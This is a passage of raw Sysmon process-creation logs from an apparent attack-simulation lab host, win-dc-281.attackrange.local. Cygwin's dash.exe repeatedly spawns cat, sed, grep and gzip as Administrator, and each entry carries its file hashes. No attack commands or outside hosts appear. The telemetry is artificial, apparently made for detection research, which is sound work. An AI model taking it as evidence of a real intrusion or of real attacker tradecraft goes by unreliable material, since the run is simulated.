14:55:54.407{A8622C2F-53FA-6078-5008-00000000AE01}6268C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000046478Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:54.398{A8622C2F-53FA-6078-4F08-00000000AE01}5116C:\cygwin64\bin\sed.exe-----"C:\cygwin64\bin\sed.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=0B641D33E8C3F5C21382EB8CB9D2C2CD,SHA256=78354D46F5E67DCDBED0FAAF1FF83CA2CE83715D3CC77CDE71C1BA8CC3FE01D5,IMPHASH=A10FE840069588D724DECD69D92555B1{A8622C2F-53FA-6078-4D08-00000000AE01}3304C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000046460Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:54.391{A8622C2F-53FA-6078-4E08-00000000AE01}5404C:\cygwin64\bin\grep.exe-----"C:\cygwin64\bin\grep.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=CA1CD62425F876E4BC2C9CAB8BA8E1FD,SHA256=A1E5531CDC240EB71083B84EA6CDFEDA5FD6BC25F2A586D52E9EF93E590D3CB6,IMPHASH=967DF82421BE009A6974726B7AE3D8E8{A8622C2F-53FA-6078-4B08-00000000AE01}6032C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000046458Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:54.391{A8622C2F-53FA-6078-4D08-00000000AE01}3304C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000046439Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:54.384{A8622C2F-53FA-6078-4C08-00000000AE01}6652C:\cygwin64\bin\gzip.exe-----"C:\cygwin64\bin\gzip.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=69CEDD6B542D0FF34889F3722B561A72,SHA256=0BF19AC24F15A5F11BC9A99336A736C11F63261AE1809E7663C37CC3FA144880,IMPHASH=A380123EE5A1337EA05DC013C75D0A34{A8622C2F-53FA-6078-4A08-00000000AE01}5996C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000046438Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:54.383{A8622C2F-53FA-6078-4B08-00000000AE01}6032C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000046426Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:54.376{A8622C2F-53FA-6078-4A08-00000000AE01}5996C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000046413Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:54.368{A8622C2F-53FA-6078-4908-00000000AE01}2952C:\cygwin64\bin\cat.exe-----"C:\cygwin64\bin\cat.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=ADF5161F9576FAB9D0DF99ED7FE60B1D,SHA256=1DD069EF0DC312E8F4CA7E4D20C785612D23A138D93A1553D564C0EABA45B2B5,IMPHASH=1E615C60AEF3904C527727A2505D9B81{A8622C2F-53FA-6078-4808-00000000AE01}1348C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000046403Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:54.361{A8622C2F-53FA-6078-4808-00000000AE01}1348C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000046390Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:54.352{A8622C2F-53FA-6078-4708-00000000AE01}5832C:\cygwin64\bin\sed.exe-----"C:\cygwin64\bin\sed.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=0B641D33E8C3F5C21382EB8CB9D2C2CD,SHA256=78354D46F5E67DCDBED0FAAF1FF83CA2CE83715D3CC77CDE71C1BA8CC3FE01D5,IMPHASH=A10FE840069588D724DECD69D92555B1{A8622C2F-53FA-6078-4508-00000000AE01}3156C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000046373Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:54.345{A8622C2F-53FA-6078-4608-00000000AE01}6968C:\cygwin64\bin\grep.exe-----"C:\cygwin64\bin\grep.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=CA1CD62425F876E4BC2C9CAB8BA8E1FD,SHA256=A1E5531CDC240EB71083B84EA6CDFEDA5FD6BC25F2A586D52E9EF93E590D3CB6,IMPHASH=967DF82421BE009A6974726B7AE3D8E8{A8622C2F-53FA-6078-4308-00000000AE01}1476C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000046370Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:54.344{A8622C2F-53FA-6078-4508-00000000AE01}3156C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000046350Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:54.337{A8622C2F-53FA-6078-4408-00000000AE01}5864C:\cygwin64\bin\gzip.exe-----"C:\cygwin64\bin\gzip.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=69CEDD6B542D0FF34889F3722B561A72,SHA256=0BF19AC24F15A5F11BC9A99336A736C11F63261AE1809E7663C37CC3FA144880,IMPHASH=A380123EE5A1337EA05DC013C75D0A34{A8622C2F-53FA-6078-4208-00000000AE01}5860C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000046349Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:54.337{A8622C2F-53FA-6078-4308-00000000AE01}1476C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000046337Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:54.330{A8622C2F-53FA-6078-4208-00000000AE01}5860C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000046325Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:54.321{A8622C2F-53FA-6078-4108-00000000AE01}6748C:\cygwin64\bin\cat.exe-----"C:\cygwin64\bin\cat.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=ADF5161F9576FAB9D0DF99ED7FE60B1D,SHA256=1DD069EF0DC312E8F4CA7E4D20C785612D23A138D93A1553D564C0EABA45B2B5,IMPHASH=1E615C60AEF3904C527727A2505D9B81{A8622C2F-53FA-6078-4008-00000000AE01}6672C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000046315Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:54.314{A8622C2F-53FA-6078-4008-00000000AE01}6672C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000046302Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:54.305{A8622C2F-53FA-6078-3F08-00000000AE01}5344C:\cygwin64\bin\sed.exe-----"C:\cygwin64\bin\sed.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=0B641D33E8C3F5C21382EB8CB9D2C2CD,SHA256=78354D46F5E67DCDBED0FAAF1FF83CA2CE83715D3CC77CDE71C1BA8CC3FE01D5,IMPHASH=A10FE840069588D724DECD69D92555B1{A8622C2F-53FA-6078-3D08-00000000AE01}1536C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000046284Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:54.297{A8622C2F-53FA-6078-3E08-00000000AE01}5224C:\cygwin64\bin\grep.exe-----"C:\cygwin64\bin\grep.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=CA1CD62425F876E4BC2C9CAB8BA8E1FD,SHA256=A1E5531CDC240EB71083B84EA6CDFEDA5FD6BC25F2A586D52E9EF93E590D3CB6,IMPHASH=967DF82421BE009A6974726B7AE3D8E8{A8622C2F-53FA-6078-3B08-00000000AE01}6268C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000046282Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:54.297{A8622C2F-53FA-6078-3D08-00000000AE01}1536C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000046264Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:54.290{A8622C2F-53FA-6078-3C08-00000000AE01}4344C:\cygwin64\bin\gzip.exe-----"C:\cygwin64\bin\gzip.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=69CEDD6B542D0FF34889F3722B561A72,SHA256=0BF19AC24F15A5F11BC9A99336A736C11F63261AE1809E7663C37CC3FA144880,IMPHASH=A380123EE5A1337EA05DC013C75D0A34{A8622C2F-53FA-6078-3A08-00000000AE01}5116C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000046262Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:54.290{A8622C2F-53FA-6078-3B08-00000000AE01}6268C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000046249Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:54.281{A8622C2F-53FA-6078-3A08-00000000AE01}5116C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000046237Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:54.272{A8622C2F-53FA-6078-3908-00000000AE01}6440C:\cygwin64\bin\cat.exe-----"C:\cygwin64\bin\cat.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=ADF5161F9576FAB9D0DF99ED7FE60B1D,SHA256=1DD069EF0DC312E8F4CA7E4D20C785612D23A138D93A1553D564C0EABA45B2B5,IMPHASH=1E615C60AEF3904C527727A2505D9B81{A8622C2F-53FA-6078-3808-00000000AE01}1408C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000046227Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:54.265{A8622C2F-53FA-6078-3808-00000000AE01}1408C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000046215Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:54.256{A8622C2F-53FA-6078-3708-00000000AE01}3008C:\cygwin64\bin\sed.exe-----"C:\cygwin64\bin\sed.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=0B641D33E8C3F5C21382EB8CB9D2C2CD,SHA256=78354D46F5E67DCDBED0FAAF1FF83CA2CE83715D3CC77CDE71C1BA8CC3FE01D5,IMPHASH=A10FE840069588D724DECD69D92555B1{A8622C2F-53FA-6078-3508-00000000AE01}5996C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000046197Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:54.249{A8622C2F-53FA-6078-3608-00000000AE01}5640C:\cygwin64\bin\grep.exe-----"C:\cygwin64\bin\grep.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=CA1CD62425F876E4BC2C9CAB8BA8E1FD,SHA256=A1E5531CDC240EB71083B84EA6CDFEDA5FD6BC25F2A586D52E9EF93E590D3CB6,IMPHASH=967DF82421BE009A6974726B7AE3D8E8{A8622C2F-53FA-6078-3308-00000000AE01}6452C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000046195Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:54.249{A8622C2F-53FA-6078-3508-00000000AE01}5996C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000046177Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:54.242{A8622C2F-53FA-6078-3408-00000000AE01}3208C:\cygwin64\bin\gzip.exe-----"C:\cygwin64\bin\gzip.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=69CEDD6B542D0FF34889F3722B561A72,SHA256=0BF19AC24F15A5F11BC9A99336A736C11F63261AE1809E7663C37CC3FA144880,IMPHASH=A380123EE5A1337EA05DC013C75D0A34{A8622C2F-53FA-6078-3208-00000000AE01}5832C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000046175Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:54.241{A8622C2F-53FA-6078-3308-00000000AE01}6452C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000046163Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:54.234{A8622C2F-53FA-6078-3208-00000000AE01}5832C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000046151Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:54.226{A8622C2F-53FA-6078-3108-00000000AE01}3156C:\cygwin64\bin\cat.exe-----"C:\cygwin64\bin\cat.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=ADF5161F9576FAB9D0DF99ED7FE60B1D,SHA256=1DD069EF0DC312E8F4CA7E4D20C785612D23A138D93A1553D564C0EABA45B2B5,IMPHASH=1E615C60AEF3904C527727A2505D9B81{A8622C2F-53FA-6078-3008-00000000AE01}1612C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000046141Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:54.219{A8622C2F-53FA-6078-3008-00000000AE01}1612C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000046127Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:54.210{A8622C2F-53FA-6078-2F08-00000000AE01}3368C:\cygwin64\bin\sed.exe-----"C:\cygwin64\bin\sed.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=0B641D33E8C3F5C21382EB8CB9D2C2CD,SHA256=78354D46F5E67DCDBED0FAAF1FF83CA2CE83715D3CC77CDE71C1BA8CC3FE01D5,IMPHASH=A10FE840069588D724DECD69D92555B1{A8622C2F-53FA-6078-2D08-00000000AE01}6040C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000046111Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:54.202{A8622C2F-53FA-6078-2E08-00000000AE01}2084C:\cygwin64\bin\grep.exe-----"C:\cygwin64\bin\grep.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=CA1CD62425F876E4BC2C9CAB8BA8E1FD,SHA256=A1E5531CDC240EB71083B84EA6CDFEDA5FD6BC25F2A586D52E9EF93E590D3CB6,IMPHASH=967DF82421BE009A6974726B7AE3D8E8{A8622C2F-53FA-6078-2B08-00000000AE01}6336C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000046109Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:54.202{A8622C2F-53FA-6078-2D08-00000000AE01}6040C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000046087Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:54.195{A8622C2F-53FA-6078-2C08-00000000AE01}2508C:\cygwin64\bin\gzip.exe-----"C:\cygwin64\bin\gzip.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=69CEDD6B542D0FF34889F3722B561A72,SHA256=0BF19AC24F15A5F11BC9A99336A736C11F63261AE1809E7663C37CC3FA144880,IMPHASH=A380123EE5A1337EA05DC013C75D0A34{A8622C2F-53FA-6078-2A08-00000000AE01}5828C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000046085Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:54.195{A8622C2F-53FA-6078-2B08-00000000AE01}6336C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000046072Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:54.188{A8622C2F-53FA-6078-2A08-00000000AE01}5828C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000046056Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:54.179{A8622C2F-53FA-6078-2908-00000000AE01}1536C:\cygwin64\bin\cat.exe-----"C:\cygwin64\bin\cat.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=ADF5161F9576FAB9D0DF99ED7FE60B1D,SHA256=1DD069EF0DC312E8F4CA7E4D20C785612D23A138D93A1553D564C0EABA45B2B5,IMPHASH=1E615C60AEF3904C527727A2505D9B81{A8622C2F-53FA-6078-2808-00000000AE01}5852C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000046042Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:54.170{A8622C2F-53FA-6078-2808-00000000AE01}5852C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000046026Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:54.161{A8622C2F-53FA-6078-2708-00000000AE01}6268C:\cygwin64\bin\sed.exe-----"C:\cygwin64\bin\sed.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=0B641D33E8C3F5C21382EB8CB9D2C2CD,SHA256=78354D46F5E67DCDBED0FAAF1FF83CA2CE83715D3CC77CDE71C1BA8CC3FE01D5,IMPHASH=A10FE840069588D724DECD69D92555B1{A8622C2F-53FA-6078-2508-00000000AE01}3304C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000046013Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 